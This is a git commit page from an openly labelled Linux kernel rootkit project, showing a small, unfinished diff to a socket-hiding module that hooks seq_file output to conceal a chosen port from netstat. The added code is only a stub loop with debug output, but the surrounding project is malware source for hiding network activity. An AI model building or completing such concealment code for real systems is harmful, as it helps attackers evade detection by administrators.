linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 7928544127cc6a37822d5032a2f5bf6fec838c02
parent e1466a6380dc21f48816d4c0931cd5a7b8f12334
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat, 12 Dec 2020 00:46:54 +0100

Further progress

Diffstat:

Msrc/sockhide.c | 8++++++++


1 file changed, 8 insertions(+), 0 deletions(-)

diff --git a/src/sockhide.c b/src/sockhide.c
@@ -6,6 +6,8 @@
 
 #define SIZE_PORT_COLON 6
 
+const char *netstat_sep = "\n";
+
 typedef unsigned short port_t;
 
 static port_t to_hide = 41821;
@@ -40,10 +42,16 @@ unhook_show(void)
     enable_protection();
 }
 
+//Hide by removing the appropriate line and decreasing the sequence number accordingly
 static void
 hide_netstat(char *port, struct seq_file *seq)
 {
+    char *tok;
+    char *cur = seq->buf;
 
+    while((tok = strsep(&cur, netstat_sep))) {
+        DEBUG_INFO("Token is %s\n", seq->buf);
+    }
 }
 
 //seq includes all the info we need